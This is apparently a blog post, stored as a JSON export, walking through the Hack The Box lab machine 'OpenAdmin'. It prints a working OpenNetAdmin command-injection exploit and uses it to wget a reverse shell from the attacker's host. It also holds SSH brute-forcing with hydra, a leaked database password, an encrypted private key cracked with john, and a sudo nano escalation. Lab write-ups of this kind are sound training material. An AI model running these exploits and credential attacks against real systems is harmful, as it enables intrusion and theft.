{"id":1375,"date":"2021-07-18T15:08:33","date_gmt":"2021-07-18T15:08:33","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1375"},"modified":"2022-06-09T14:49:16","modified_gmt":"2022-06-09T14:49:16","slug":"openadmin","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/18\/openadmin\/","title":{"rendered":"OpenAdmin"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Level<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/222\" title=\"OpenAdmin\">OpenAdmin<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/5b00db157dbbd7099ff6c0ef10f910ea.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Let's start with an Nmap scan.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 9\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-17 21:59 EDT\nNmap scan report for 10.10.10.171\nHost is up (0.25s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)\n|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)\n|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7\/17%OT=22%CT=1%CU=40349%PV=Y%DS=2%DC=T%G=Y%TM=60F38EB\nOS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ\nOS:(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O\nOS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=\nOS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN\nOS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D\nOS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O\nOS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W\nOS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R\nOS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 143\/tcp)\nHOP RTT       ADDRESS\n1   120.51 ms 10.10.16.1\n2   326.87 ms 10.10.10.171\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 960.96 seconds\n<\/code><\/pre>\n<p>Following that, I started nikto and gobuster scans against port 80.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# gobuster dir --url http:\/\/10.10.10.171\/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirb\/big.txt --no-error | tee gobuster1\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.171\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              sql,bash,pcap,rar,conf,sh,php,txt,zip,7z,html,bak,php5,cap\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/17 19:59:23 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.171\/.htaccess.sql        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.sql        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.bash       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.sh         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd\/           (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.php5       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.html       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.php        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.html       (Status: 403) 
[Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.rar        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.php5       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.cap        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.cap        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.bak        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.rar        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.pcap       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.conf       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.php        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.bak        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.txt        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess\/           (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.zip        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.7z         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.7z         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.pcap       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.sh         (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.txt        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.bash       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htaccess.zip        (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/.htpasswd.conf       (Status: 403) [Size: 277]\nhttp:\/\/10.10.10.171\/artwork\/             (Status: 200) [Size: 14461]\nhttp:\/\/10.10.10.171\/icons\/               (Status: 403) [Size: 277]  \nhttp:\/\/10.10.10.171\/index.html           (Status: 200) [Size: 10918]\nhttp:\/\/10.10.10.171\/music\/               (Status: 200) [Size: 12554]\nhttp:\/\/10.10.10.171\/server-status\/       (Status: 403) [Size: 277]  \nhttp:\/\/10.10.10.171\/sierra\/              (Status: 200) [Size: 43029]<\/code><\/pre>\n<p>During the gobuster scans I saw that an application was running at <strong><a href=\"http:\/\/10.10.10.171\/music\/\">http:\/\/10.10.10.171\/music\/<\/a> <\/strong>, and its version information was exposed as well. I ran an exploit search for it.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# searchsploit opennetadmin          \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nOpenNetAdmin 13.03.01 - Remote Code Execution                                                                                                                                                               | php\/webapps\/26682.txt\nOpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                                                                                                | php\/webapps\/47772.rb\nOpenNetAdmin 18.1.1 - Remote Code Execution                                                                                                                                                                 | 
php\/webapps\/47691.sh\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# cp $(locate php\/webapps\/47691.sh) .\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# cat 47691.sh                       \n# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution\n# Date: 2019-11-19\n# Exploit Author: mattpascoe\n# Vendor Homepage: http:\/\/opennetadmin.com\/\n# Software Link: https:\/\/github.com\/opennetadmin\/ona\n# Version: v18.1.1\n# Tested on: Linux\n\n# Exploit Title: OpenNetAdmin v18.1.1 RCE\n# Date: 2019-11-19\n# Exploit Author: mattpascoe\n# Vendor Homepage: http:\/\/opennetadmin.com\/\n# Software Link: https:\/\/github.com\/opennetadmin\/ona\n# Version: v18.1.1\n# Tested on: Linux\n\n#!\/bin\/bash\n\nURL=&quot;${1}&quot;\nwhile true;do\n echo -n &quot;$ &quot;; read cmd\n curl --silent -d &quot;xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;echo \\&quot;BEGIN\\&quot;;${cmd};echo \\&quot;END\\&quot;&amp;xajaxargs[]=ping&quot; &quot;${URL}&quot; | sed -n -e &#039;\/BEGIN\/,\/END\/ p&#039; | tail -n +2 | head -n -1\ndone                                                                                                                                                                                                                                              \n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# curl --silent -d &quot;xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;echo \\&quot;BEGIN\\&quot;;whoami;echo \\&quot;END\\&quot;&amp;xajaxargs[]=ping&quot; http:\/\/10.10.10.171\/ona\/ | sed -n -e &#039;\/BEGIN\/,\/END\/ p&#039; | tail -n +2 | head -n -1\nwww-data\n<\/code><\/pre>\n<p>Great! We have RCE. I had write permission in the directory I was working in on the machine, so I uploaded a reverse shell into it.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# curl --silent -d &quot;xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;echo \\&quot;BEGIN\\&quot;;wget http:\/\/10.10.16.56:1111\/reverse4kuday.php;echo \\&quot;END\\&quot;&amp;xajaxargs[]=ping&quot; http:\/\/10.10.10.171\/ona\/ | sed -n -e &#039;\/BEGIN\/,\/END\/ p&#039; | tail -n +2 | head -n -1\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# curl --silent -d &quot;xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;echo \\&quot;BEGIN\\&quot;;ls -al;echo \\&quot;END\\&quot;&amp;xajaxargs[]=ping&quot; http:\/\/10.10.10.171\/ona\/ | sed -n -e &#039;\/BEGIN\/,\/END\/ p&#039; | tail -n +2 | head -n -1 \ntotal 132\ndrwxrwxr-x 10 www-data www-data  4096 Jul 18 00:33 .\ndrwxr-x---  7 www-data www-data  4096 Nov 21  2019 ..\n-rw-rw-r--  1 www-data www-data  1970 Jan  3  2018 .htaccess.example\n-rw-r--r--  1 www-data www-data 12288 Jul 17 20:08 .reverse.php.swp\ndrwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 config\n-rw-rw-r--  1 www-data www-data  1949 Jan  3  2018 config_dnld.php\n-rw-rw-r--  1 www-data www-data  4160 Jan  3  2018 dcm.php\n-rwxr-xr-x  1 www-data www-data  5494 Jul 17 19:43 diohan.php\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 images\ndrwxrwxr-x  9 www-data www-data  4096 Jan  3  2018 include\n-rw-rw-r--  1 www-data www-data  1999 Jan  3  2018 index.php\n-rw-r--r--  1 www-data www-data     0 Jul 18 00:31 kuday\ndrwxrwxr-x  5 www-data www-data  4096 Jan  3  2018 local\n-rw-rw-r--  1 www-data www-data  4526 Jan  3  2018 login.php\n-rw-rw-r--  1 www-data www-data  1106 Jan  3  2018 logout.php\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 modules\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 plugins\n-rw-r--r--  1 www-data www-data  1111 Jul 17 08:46 reverse.php\n-rw-r--r--  1 www-data www-data  5493 Jul 18 00:19 reverse4kuday.php\n-rw-r--r--  1 www-data www-data  5495 Jul 17 20:02 rshell.php\n-rw-r--r--  1 www-data www-data    76 Jul 17 19:57 shell.php\n-rw-r--r--  1 www-data www-data    73 Jul 17 19:40 shell.php.1\n-rw-r--r--  1 www-data www-data    76 Jul 17 19:57 shell.php.2\n-rw-r--r--  1 www-data www-data  5493 Jul 17 18:18 supaShell.php\ndrwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 winc\ndrwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 workspace_plugins\n<\/code><\/pre>\n<p>When I triggered the reverse shell from the browser, a shell landed on my listener.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# nc -lvp 1234         \nlistening on [any] 1234 ...\n10.10.10.171: inverse host lookup failed: Unknown host\nconnect to [10.10.16.56] from (UNKNOWN) [10.10.10.171] 43070\nLinux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU\/Linux\n 00:34:10 up 1 day,  3:10,  0 users,  load average: 3.43, 4.79, 3.99\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ ifconfig\nens160: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255\n        inet6 dead:beef::250:56ff:feb9:3463  prefixlen 64  scopeid 0x0&lt;global&gt;\n        inet6 fe80::250:56ff:feb9:3463  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 00:50:56:b9:34:63  txqueuelen 1000  (Ethernet)\n        RX packets 2797350  bytes 376270029 (376.2 MB)\n        
RX errors 0  dropped 863  overruns 0  frame 0\n        TX packets 2762041  bytes 949913630 (949.9 MB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;\n        loop  txqueuelen 1000  (Local Loopback)\n        RX packets 277881  bytes 20887608 (20.8 MB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 277881  bytes 20887608 (20.8 MB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0<\/code><\/pre>\n<p>While browsing around inside, I found the database config file.<\/p>\n<pre><code class=\"language-sh\">?&gt;$ cat \/opt\/ona\/www\/local\/config\/database_settings.inc.php\n&lt;?php\n\n$ona_contexts=array (\n  &#039;DEFAULT&#039; =&gt; \n  array (\n    &#039;databases&#039; =&gt; \n    array (\n      0 =&gt; \n      array (\n        &#039;db_type&#039; =&gt; &#039;mysqli&#039;,\n        &#039;db_host&#039; =&gt; &#039;localhost&#039;,\n        &#039;db_login&#039; =&gt; &#039;ona_sys&#039;,\n        &#039;db_passwd&#039; =&gt; &#039;n1nj4W4rri0R!&#039;,\n        &#039;db_database&#039; =&gt; &#039;ona_default&#039;,\n        &#039;db_debug&#039; =&gt; false,\n      ),\n    ),\n    &#039;description&#039; =&gt; &#039;Default data context&#039;,\n    &#039;context_color&#039; =&gt; &#039;#D3DBFF&#039;,\n  ),\n);\n\n?&gt;$ <\/code><\/pre>\n<p>While I was brute-forcing SSH with hydra, I stopped the attack and had it try the password found here against the known users instead. That is how I identified this user.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# hydra -L users -P passwords ssh:\/\/10.10.10.171\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-07-17 21:02:49\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:2\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/10.10.10.171:22\/\n[22][ssh] host: 10.10.10.171   login: jimmy   password: n1nj4W4rri0R!\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-07-17 21:02:55\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# ssh jimmy@10.10.10.171                        \njimmy@10.10.10.171&#039;s password: \nWelcome to Ubuntu 18.04.3 LTS (GNU\/Linux 4.15.0-70-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sun Jul 18 01:13:37 UTC 2021\n\n  System load:  0.82              Processes:             244\n  Usage of \/:   53.4% of 7.81GB   Users logged in:       0\n  Memory usage: 49%               IP address for ens160: 10.10.10.171\n  Swap usage:   0%\n\n  =&gt; There are 6 zombie processes.\n\n * Canonical Livepatch is available for installation.\n   - Reduce system reboots and improve kernel security. 
Activate at:\n     https:\/\/ubuntu.com\/livepatch\n\n41 packages can be updated.\n12 updates are security updates.\n\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. Check your Internet connection or proxy settings\n\nLast login: Sat Jul 17 20:42:12 2021 from 10.10.14.131\njimmy@openadmin:~$ \n<\/code><\/pre>\n<p>While I was in the information-gathering phase on the box, I noticed something interesting.<\/p>\n<pre><code class=\"language-sh\">---\n================================================================( network )=====\n[*] net000 Services listening only on localhost............................ yes!\n---\ntcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     \ntcp    LISTEN   0        128             127.0.0.1:52846          0.0.0.0:* <\/code><\/pre>\n<p>3306 was MySQL, but I had no idea what 52846 was. I realized it was a web service and figured it was probably serving the code in the internal folder under www.<\/p>\n<pre><code class=\"language-sh\">jimmy@openadmin:\/var\/www\/internal$ ls\ntotal 20\ndrwxrwxrwx 2 jimmy internal 4096 Nov 23  2019 .\ndrwxr-xr-x 4 root  root     4096 Nov 22  2019 ..\n-rwxrwxrwx 1 jimmy internal 3229 Nov 22  2019 index.php\n-rwxrwxrwx 1 jimmy internal  185 Nov 23  2019 logout.php\n-rwxrwxrwx 1 jimmy internal  339 Nov 23  2019 main.php\njimmy@openadmin:\/var\/www\/internal$ cat main.php \n&lt;?php session_start(); if (!isset ($_SESSION[&#039;username&#039;])) { header(&quot;Location: \/index.php&quot;); }; \n# Open Admin Trusted\n# OpenAdmin\n$output = shell_exec(&#039;cat \/home\/joanna\/.ssh\/id_rsa&#039;);\necho &quot;&lt;pre&gt;$output&lt;\/pre&gt;&quot;;\n?&gt;\n&lt;html&gt;\n&lt;h3&gt;Don&#039;t forget your &quot;ninja&quot; password&lt;\/h3&gt;\nClick here to logout &lt;a href=&quot;logout.php&quot; tite = &quot;Logout&quot;&gt;Session\n&lt;\/html&gt;\n<\/code><\/pre>\n<p>As you can see, main.php prints the joanna user's SSH private key to the page. I tried it and it worked.<\/p>\n<pre><code class=\"language-sh\">jimmy@openadmin:\/var\/www\/internal$ curl http:\/\/127.0.0.1:52846\/main.php\n&lt;pre&gt;-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D\n\nkG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8\nad\/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO\nShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE\n6xaubNKhDJKs\/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ\nZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5\/Du\ny8byJ\/3I3\/EsqHphIHgD3UfvHy9naXc\/nLUup7s0+WAZ4AUx\/MJnJV2nN8o69JyI\n9z7V9E4q\/aKCh\/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4\npiC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv\/dEVEppvIDE\/8h\/\n\/U1cPvX9Aci0EUys3naB6pVW8i\/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH\n40ZNca5xHPij8hvUR2v5jGM\/8bvr\/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN\/AZ\nfnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb\n9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80\nX1VZ+N7S8ZP+7djB22vQ+\/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg\nS33lgrCM4\/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey\/ur\/4F\nFnonsEl16TZvolSt9RH\/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh\nTh5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD\/GtPmcviGCexa\nRTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z\nuhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA\/MxlYJ9FNDr\n1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2\nXGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM\/SLhS79\nyPzCZH8uWIrjaNaZmDSPC\/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM\n+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7\/ee6KDTl7JMdV25DM9a16JYOneRtMt\nqlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebD
oYf5VSSSZYtCNJdwt3lF7I8+adt\nz0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe\nK1I1cqiDbVE\/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw\/iMKhpITWLWApA3k9EN\n-----END RSA PRIVATE KEY-----\n&lt;\/pre&gt;&lt;html&gt;\n&lt;h3&gt;Don&#039;t forget your &quot;ninja&quot; password&lt;\/h3&gt;\nClick here to logout &lt;a href=&quot;logout.php&quot; tite = &quot;Logout&quot;&gt;Session\n&lt;\/html&gt;\n<\/code><\/pre>\n<p>However, the key was passphrase-protected; I was able to crack it quickly with john.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# \/usr\/share\/john\/ssh2john.py id \nid:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$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\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# \/usr\/share\/john\/ssh2john.py id &gt; ssh2john\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# john ssh2john --wordlist=\/usr\/share\/wordlists\/rockyou.txt                                1 \u2a2f\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH [RSA\/DSA\/EC\/OPENSSH (SSH private keys) 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 0 for all loaded hashes\nCost 2 (iteration count) is 1 for all loaded hashes\nWill run 4 OpenMP threads\nNote: This format may emit false positives, so it will keep trying even after\nfinding a possible candidate.\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nbloodninjas      (id)\nWarning: Only 2 candidates left, minimum 4 needed for performance.\n1g 0:00:00:04 DONE (2021-07-17 22:02) 0.2475g\/s 3549Kp\/s 3549Kc\/s 3549KC\/sa6_123..*7\u00a1Vamos!\nSession completed\n<\/code><\/pre>\n<p>Now we can connect.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# ssh joanna@10.10.10.171 -i id           
                 \nEnter passphrase for key &#039;id&#039;: \nWelcome to Ubuntu 18.04.3 LTS (GNU\/Linux 4.15.0-70-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sun Jul 18 02:15:39 UTC 2021\n\n  System load:  1.35              Processes:             238\n  Usage of \/:   53.4% of 7.81GB   Users logged in:       1\n  Memory usage: 49%               IP address for ens160: 10.10.10.171\n  Swap usage:   0%\n\n  =&gt; There are 6 zombie processes.\n\n * Canonical Livepatch is available for installation.\n   - Reduce system reboots and improve kernel security. Activate at:\n     https:\/\/ubuntu.com\/livepatch\n\n41 packages can be updated.\n12 updates are security updates.\n\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. Check your Internet connection or proxy settings\n\nLast login: Sat Jul 17 21:21:40 2021 from 10.10.14.131\njoanna@openadmin:~$ \n<\/code><\/pre>\n<p>\u015eimdi ilgin\u00e7 bir \u015fey yapaca\u011f\u0131z. 
Ama \u00f6ncesinde flagimizi alal\u0131m.<\/p>\n<pre><code class=\"language-sh\">joanna@openadmin:~$ alias ls=&quot;ls -al&quot;\njoanna@openadmin:~$ ls\ntotal 44\ndrwxr-x--- 6 joanna joanna 4096 Jul 17 23:47 .\ndrwxr-xr-x 4 root   root   4096 Nov 22  2019 ..\nlrwxrwxrwx 1 joanna joanna    9 Nov 22  2019 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 joanna joanna  220 Nov 22  2019 .bash_logout\n-rw-r--r-- 1 joanna joanna 3771 Nov 22  2019 .bashrc\ndrwx------ 2 joanna joanna 4096 Nov 22  2019 .cache\ndrwx------ 3 joanna joanna 4096 Nov 22  2019 .gnupg\ndrwxrwxr-x 3 joanna joanna 4096 Nov 22  2019 .local\n-rw------- 1 joanna joanna  170 Jul 17 23:47 nano.save\n-rw-r--r-- 1 joanna joanna  807 Nov 22  2019 .profile\ndrwx------ 2 joanna joanna 4096 Nov 23  2019 .ssh\n-rw-rw-r-- 1 joanna joanna   33 Nov 28  2019 user.txt\njoanna@openadmin:~$ cat user.txt \nc9**********************************\n<\/code><\/pre>\n<p>Kullan\u0131c\u0131n\u0131n a\u015fa\u011f\u0131da g\u00f6rd\u00fc\u011f\u00fcn\u00fcz gibi nano'yu root olarak \u00e7al\u0131\u015ft\u0131rabilme hakk\u0131 var.<\/p>\n<pre><code class=\"language-sh\">joanna@openadmin:\/home$ sudo -l\nMatching Defaults entries for joanna on openadmin:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser joanna may run the following commands on openadmin:\n    (ALL) NOPASSWD: \/bin\/nano \/opt\/priv\n<\/code><\/pre>\n<p>Yetki y\u00fckseltmeyi \u015fu \u015fekilde yapt\u0131m, root haklar\u0131nda nano arac\u0131yla \/opt\/priv'y a\u00e7t\u0131m. 
